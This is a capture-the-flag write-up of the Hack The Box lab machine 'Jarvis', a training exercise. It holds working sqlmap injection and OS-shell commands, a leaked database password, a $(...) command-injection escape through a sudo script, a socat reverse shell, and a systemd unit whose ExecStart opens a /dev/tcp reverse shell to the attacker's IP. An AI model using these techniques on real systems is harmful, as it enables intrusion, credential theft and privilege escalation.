HTB - Jarvis
Writeup for the retired HTB machine Jarvis
Link: https://www.hackthebox.eu/home/machines/profile/194
IP: 10.10.10.143
Recon
nmap reveals a very limited port selection:
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
5355/tcp filtered llmnr
64999/tcp open http Apache httpd 2.4.25 ((Debian))
The web page on port 80 is a php site with not much at the first glance.
On port 64999 you’ll get a blank page with “Hey you have been banned for 90 seconds, don’t be bad” on the first call.
As a preliminary investigation, gobuster is used to find additional content on the webserver.
Gobuster port 80
/images (Status: 301)
/index.php (Status: 200)
/nav.php (Status: 200)
/footer.php (Status: 200)
/back.php (Status: 200)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/phpmyadmin (Status: 301)
/connection.php (Status: 200)
/room.php (Status: 302)
/sass (Status: 301)
/server-status (Status: 403)
Exploring the website leads to weird reactions if the Room Booking (http://10.10.10.143/room.php?cod=1) is manipulated with. Guessing from these results and the URL schema, a closer inspection of SQL Injection capabilities was concluded.
SQLMap
Running SQLmap with the dump parameter yields to successful execution.
sqlmap -u http://10.10.10.143/room.php?cod=2 --dump
As a next step, a password dump is attempted with rockyou.txt as dictionary file:
sqlmap -u http://10.10.10.143/room.php?cod=2 --passwords
which is successful:
[10:43:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
(...)
[10:44:04] [INFO] starting dictionary-based cracking (mysql_passwd)
[10:44:04] [INFO] starting 2 processes
[10:44:04] [INFO] cracked password 'imissyou' for user 'DBadmin' (...)
database management system users password hashes:
[*] DBadmin [1]:
password hash: *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
clear-text password: imissyou
With these credentials, loggin into phpMyAdmin is possible. As SQLMap is also able to spawn shells under certain circumstances, this is worth trying as well:
sqlmap -u http://10.10.10.143/room.php?cod=2 --os-shell
which yields a shell as www-data. By looking around a bit, we learn that the target OS user is named pepper.
Also, there’s an interesting script in /var/www/Admin-Utilities, it’s simpler.py.
Again, with SQLMap, this file can be downloaded:
sqlmap -u http://10.10.10.143/room.php?cod=2 --file-read=/var/www/Admin-Utilities/simpler.py
On closer inspection, the script seems to execute actions in the user home folder of pepper. As this script is executed as www-data, there must be a sudo entry to run it as pepper. This can be confirmed by running sudo -l:
sqlmap -u http://10.10.10.143/room.php?cod=2 --os-cmd="sudo -l"
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
At this point, a switch to a fully interactive session is needed. This can be archieved by running a local webserver on the attacker machine and serving a prepared PHP reverse shell (apalaxsh.php) that is downloaded via wget or curl to the target systems web dir (www-data).
With a running netcat receiver on the attacker machine (nc -nvlp 9999), the shell is triggered by pointing a browser to /apalaxsh.php, which yields a shell.
Road to user
Now the script can be further examined in its native run environment as sudoed user:
sudo --user=pepper /var/www/Admin-Utilities/simpler.py
This article on Infoblox Shell Escape provides some ideas on how to escape via sudo/ping:
$ sudo --user=pepper /var/www/Admin-Utilities/simpler.py -p
Enter an IP: $(cat /home/pepper/user.txt)
ping: 2afa36c4f05b37b34259[...]]: Temporary failure in name resolution
which yields the user flag.
But this is not everything this shell can do. By upgrading the shell to a full interactive shell first (python -c 'import pty; pty.spawn("/bin/sh")'),
we’re able to spawn a shell as pepper:
sudo --user=pepper /var/www/Admin-Utilities/simpler.py -p
Enter an IP: $(/bin/bash)
$(/bin/bash)
pepper@jarvis:/$
This shell isn’t perfectly working, so it is upgraded to a full reverse shell. With nc running on port 8989, this command yields a fully functioning shell:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.15.195:8989
Road to root
Exploring privilege escalation routes, it turns out that systemctl has the SETUID bit set, meaning it can run with root privileges. Creating a systemctl oneshot service that spawns a reverse shell as root is therefore possible:
[Unit]
Description=Black magic happening, avert your eyes
[Service]
RemainAfterExit=yes
Type=simple
ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.10.15.195/8888; cat <&5 | while read line; do $line 2>&5 >&5; done"
[Install]
WantedBy=default.target
Then make use of systemctl link to link the service file into the correct position:
systemctl link /home/pepper/apalax.service
and enable it, therefore opening the connection to port 8888 on our Machine:
systemctl start --now apalax
This spawns a minimal shell that is functioning enough to print the contents of root.txt.